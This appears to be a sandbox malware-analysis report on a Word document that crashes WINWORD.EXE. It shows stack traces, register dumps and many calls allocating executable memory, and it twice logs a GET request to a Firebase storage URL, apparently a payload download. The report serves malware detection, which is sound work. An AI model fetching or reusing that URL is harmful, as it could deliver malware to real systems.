DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef
_MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0
_MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab
??0OdfStgParams@@QAE@XZ+0xec034 mso+0xfeef3a @ 0x709bef3a
DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0
_MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4
_MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b
_MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a
_MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41
_MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43
_GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37
_GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d
_GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667
_GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169
_GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6
wdCommandDispatch-0x964 winword+0x1602 @ 0x2f881602
wdCommandDispatch-0x9cc winword+0x159a @ 0x2f88159a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x7588b727
registers.esp: 2081740
registers.edi: 2081904
registers.eax: 2081740
registers.ebp: 2081820
registers.edx: 0
registers.ebx: 2082956
registers.esi: 3221549073
registers.ecx: 2147483648

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://firebasestorage.googleapis.com/v0/b/fir-8c14f.appspot.com/o/jod.jpg?alt=media&token=3735f1cc-35d0-4cea-8a29-811cec71fe1b

Performs some HTTP requests (1 event)

request

GET https://firebasestorage.googleapis.com/v0/b/fir-8c14f.appspot.com/o/jod.jpg?alt=media&token=3735f1cc-35d0-4cea-8a29-811cec71fe1b

Allocates read-write-execute memory (usually to unpack itself) (50 out of 197 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a351000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00643000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00643000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00644000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00644000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:14 p.m.	process_identifier: 3036 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x66b24000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 720896 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02950000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x68e61000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x68e62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02632000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0263b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02662000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0266c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02663000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02664000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02665000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02666000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02667000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02668000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02669000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05050000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05051000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05052000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05053000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05054000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05055000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05056000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05057000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05058000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05059000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 18, 2023, 12:13 p.m.	process_identifier: 2184 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0505e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process WINWORD.EXE with pid 3036 crashed
__exception__ June 18, 2023, 12:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x737c33cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21 SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074 SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x667985c7 ??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28 DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d _MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x8007007b exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 108852260 registers.edi: 108852424 registers.eax: 108852260 registers.ebp: 108852340 registers.edx: 0 registers.ebx: 108853476 registers.esi: 2147942523 registers.ecx: 2147483648	1	0	0
__exception__ June 18, 2023, 12:14 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08 NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a SLClose-0x28e osppc+0x33cf @ 0x737c33cf SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21 SLpGetTokenActivationGrantInfo+0x13c SLpGenerateTokenActivationChallenge-0x11c osppc+0x13102 @ 0x737d3102 SLGetTokenActivationGrants+0x710 SLGetTokenActivationCertificates-0x7a8 osppcext+0x5f7d0 @ 0x667bf7d0 ??0OdfStgParams@@QAE@XZ+0xbb1e7 mso+0xfbe0ed @ 0x7098e0ed ??0OdfStgParams@@QAE@XZ+0xbb3c9 mso+0xfbe2cf @ 0x7098e2cf DllGetClassObject+0x3c2bb _MsoFActivateControl@4-0x25231 mso+0xa84871 @ 0x70454871 DllGetClassObject+0x3c339 _MsoFActivateControl@4-0x251b3 mso+0xa848ef @ 0x704548ef _MsoFHideTaiwan@0+0x4ccf _MsoSetLVProperty@8-0x7e2a9 mso+0x274ea0 @ 0x6fc44ea0 _MsoFDoSmartTagSecurityCheck@8+0xb6367 _MsoCompareStringA@24-0x391 mso+0x61d7ab @ 0x6ffed7ab ??0OdfStgParams@@QAE@XZ+0xec034 mso+0xfeef3a @ 0x709bef3a DllGetLCID+0x5c144 _MsoWebServerSupportEx@12-0x1c8929 mso+0x6bc517 @ 0x7008c517 _MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4 _MsoFGetTooltips@0+0x8844 _MsoHrSimpleQueryInterface@16-0x122ee mso+0xc8ff0 @ 0x6fa98ff0 _MsoPeekMessage@8+0x49e5 _MsoGetStringTypeExW@20-0x1652 mso+0xb7292 @ 0x6fa87292 _MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d _MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14 _MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21 _MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991 _MsoPeekMessage@8+0x4537 _MsoGetStringTypeExW@20-0x1b00 mso+0xb6de4 @ 0x6fa86de4 _MsoPeekMessage@8+0x446e _MsoGetStringTypeExW@20-0x1bc9 mso+0xb6d1b @ 0x6fa86d1b _MsoPeekMessage@8+0x16ad _MsoGetStringTypeExW@20-0x498a mso+0xb3f5a @ 0x6fa83f5a _MsoPeekMessage@8+0x2294 _MsoGetStringTypeExW@20-0x3da3 mso+0xb4b41 @ 0x6fa84b41 _MsoPeekMessage@8+0x1196 _MsoGetStringTypeExW@20-0x4ea1 mso+0xb3a43 @ 0x6fa83a43 _GetAllocCounters@0+0x5006f DllGetLCID-0x1a6bbf wwlib+0x66e37 @ 0x71fb6e37 _GetAllocCounters@0+0x50f95 DllGetLCID-0x1a5c99 wwlib+0x67d5d @ 0x71fb7d5d _GetAllocCounters@0+0x4d89f DllGetLCID-0x1a938f wwlib+0x64667 @ 0x71fb4667 _GetAllocCounters@0+0x4c3a1 DllGetLCID-0x1aa88d wwlib+0x63169 @ 0x71fb3169 _GetAllocCounters@0+0x4a61e DllGetLCID-0x1ac610 wwlib+0x613e6 @ 0x71fb13e6 wdCommandDispatch-0x964 winword+0x1602 @ 0x2f881602 wdCommandDispatch-0x9cc winword+0x159a @ 0x2f88159a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xc004f011 exception.offset: 46887 exception.address: 0x7588b727 registers.esp: 2081740 registers.edi: 2081904 registers.eax: 2081740 registers.ebp: 2081820 registers.edx: 0 registers.ebx: 2082956 registers.esi: 3221549073 registers.ecx: 2147483648	1	0	0

Application Crash

Process WINWORD.EXE with pid 3036 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

June 18, 2023, 12:14 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x750b374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x750d2b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x750a801a
SLClose-0x28e osppc+0x33cf @ 0x737c33cf
SLLoadApplicationPolicies+0xa99 SLCallServer-0x330 osppc+0x15dba @ 0x737d5dba
SLClose+0x4c4 SLpBeginGenuineTicketTransaction-0x4f79 osppc+0x3b21 @ 0x737c3b21
SLpVLActivateProduct+0xcb SLpGetMSPidInformation-0x111 osppc+0x12074 @ 0x737d2074
SLActivateProduct+0x48e SLInitialize-0x110a osppcext+0x385c7 @ 0x667985c7
??0OdfStgParams@@QAE@XZ+0xbae22 mso+0xfbdd28 @ 0x7098dd28
DllGetLCID+0x5c042 _MsoWebServerSupportEx@12-0x1c8a2b mso+0x6bc415 @ 0x7008c415
_MsoFGetTooltips@0+0x8918 _MsoHrSimpleQueryInterface@16-0x1221a mso+0xc90c4 @ 0x6fa990c4
_MsoFGetTooltips@0+0x88ca _MsoHrSimpleQueryInterface@16-0x12268 mso+0xc9076 @ 0x6fa99076
_MsoPeekMessage@8+0x49a0 _MsoGetStringTypeExW@20-0x1697 mso+0xb724d @ 0x6fa8724d
_MsoCpgFromChs@4+0x14e3 _MsoCrCbvGet@4-0xa6c mso+0x30f14 @ 0x6fa00f14
_MsoGetHmodPTLServices@0+0x4883 _MsoCpgFromChs@4-0x1e10 mso+0x2dc21 @ 0x6f9fdc21
_MsoGetHmodPTLServices@0+0x45f3 _MsoCpgFromChs@4-0x20a0 mso+0x2d991 @ 0x6f9fd991
_MsoGetHmodPTLServices@0+0x326f _MsoCpgFromChs@4-0x3424 mso+0x2c60d @ 0x6f9fc60d
_MsoFCreateIPref@28+0x143f _MsoFUseIEFeature@8-0xee0 mso+0x22ce6 @ 0x6f9f2ce6
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
